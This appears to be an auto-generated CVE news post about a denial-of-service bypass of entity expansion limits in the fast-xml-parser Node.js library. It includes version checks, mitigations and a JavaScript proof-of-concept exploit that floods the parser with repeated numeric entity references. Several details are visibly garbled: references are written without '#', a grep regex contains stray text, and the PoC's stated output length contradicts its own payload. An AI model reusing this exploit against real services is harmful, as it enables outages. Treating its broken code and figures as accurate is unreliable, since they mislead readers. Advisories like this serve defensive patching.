fast-xml-parser, Improper Restriction of Numeric Entity Expansion (CVE-2026-33036) (Critical)

Listen to this Post

The fix for CVE-2026-26278 introduced limits like `maxTotalExpansions` and `maxExpandedLength` to block XML entity expansion DoS attacks, but these only apply to DOCTYPE-defined entities. Numeric character references (&NNN; and &xHH;) and standard XML entities are processed by a separate code path in `OrderedObjParser.js` (the `lastEntities` loop) that lacks any expansion limits. Attackers can supply massive numbers of numeric entity references—such as 100,000 `&65;` entries—to completely bypass configured limits. This forces excessive regex replacements, ballooning memory allocation (147MB+ for 1M references) and CPU consumption, potentially crashing the process. Even with strict limits like maxTotalExpansions:10, the parser will expand thousands of numeric entities, demonstrating the bypass. This is critical because developers who set entity limits believing they are protected remain vulnerable. The issue affects fast-xml-parser v5.x through v5.5.3 (and v5.5.5 on npm). No patch existed for this bypass as of the original analysis, but a fix would require applying expansion counting to the numeric entity replacement loop .
Platform: fast-xml-parser
Version: v5.x – v5.5.5
Vulnerability: Numeric entity expansion bypass
Severity: Critical
Date: March 17, 2026

Prediction: Patch expected immediately

What Undercode Say:

Analytics

This vulnerability (CVE-2026-33036) represents a complete logic bypass of the previous CVE-2026-26278 patch. The initial fix only instrumented DOCTYPE entity expansion loops but overlooked numeric/hex character references (&65;, &x41;), which traverse an entirely separate code path. This oversight renders all configured entity limits (maxTotalExpansions, maxExpandedLength, maxEntityCount, maxEntitySize) ineffective. An attacker can trivially cause Denial of Service (DoS) with small XML payloads containing thousands of numeric references, leading to memory exhaustion (~147MB for 1M `&65;` references) and CPU spikes. The root cause is in `src/xmlparser/OrderedObjParser.js` where the `lastEntities` loop processes numeric entities without any expansion counting, unlike the DOCTYPE loop.

Bash Commands

Check installed version of fast-xml-parser in a Node.js project
npm list fast-xml-parser
Check globally installed version
npm list -g fast-xml-parser
Check if your project uses a vulnerable version (v5.x to v5.5.5)
grep '"fast-xml-parser"' package.json | grep -E '"([bash].[0-5].([0-9]|[0-5][0-9]))"'
Install the patched version (once available)
npm install [email protected]
Or force install latest version
npm install fast-xml-parser@latest
Test a local file for potential vulnerability using curl (example)
curl -X POST -H "Content-Type: application/xml" --data-binary @malicious.xml http://your-server/endpoint
Monitor memory usage of a Node.js process during XML parsing
pidstat -r -p <NODE_PID> 1
Check for entity expansion attempts in logs
grep -i "entity|expansion|DOCTYPE" /var/log/application.log

How Exploit

// Exploit PoC: Bypass all entity limits using numeric references
const { XMLParser } = require('fast-xml-parser');
// Attacker-controlled strict limits (falsely secure)
const parser = new XMLParser({
processEntities: {
enabled: true,
maxTotalExpansions: 10, // Should block after 10 expansions
maxExpandedLength: 100, // Should block at 100 chars
maxEntityCount: 1,
maxEntitySize: 10
}
});
// Payload: 100,000 numeric references 'A' (&65;)
// Expected to expand to 500,000 characters, bypassing all limits
const xml = <code><root>${'&65;'.repeat(100000)}</root></code>;
try {
const result = parser.parse(xml);
console.log('Output length:', result.root.length); // 500000 (limit was 100)
console.log('Bypass successful — limits ignored.');
} catch (e) {
console.log('Blocked (should not happen):', e.message);
}

Executing the above with a vulnerable version (v5.5.5) results in memory consumption spiking to ~147MB and output length far exceeding maxExpandedLength:100, confirming the bypass.

Protection from this CVE

  • Immediate Patch: Upgrade to fast-xml-parser v5.5.6 or higher once released .
  • Workaround: Disable HTML entity processing entirely if not required:
    const parser = new XMLParser({
    htmlEntities: false // Disables the vulnerable numeric entity path
    });
    
  • Mitigation: If DOCTYPE processing is not needed, disable it:
    const parser = new XMLParser({
    processEntities: false
    });
    
  • Input Validation: Reject XML containing numeric/hex character references (&) if the application does not require them.
  • Resource Limits: Run XML parsing in a separate worker thread with strict memory and CPU timeouts to contain DoS impact.

Impact

  • Denial of Service: Remote attackers can freeze or crash Node.js applications by sending small XML payloads containing thousands of numeric entity references (e.g., `&65;` repeated 1M times consumes ~147MB RAM) .
  • Bypass of Security Controls: All entity limits introduced in CVE-2026-26278 are completely circumvented, undermining developer trust in the library’s security configuration.
  • Resource Exhaustion: Excessive CPU usage during regex replacement loops blocks the Node.js event loop, making the entire application unresponsive to other requests.
  • Widespread Risk: Any service parsing user-supplied XML with fast-xml-parser v5.x through v5.5.5 is vulnerable, especially APIs and data processing pipelines.

References:

  • CVE-2026-33036 detail
  • CVE-2026-26278 original advisory

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top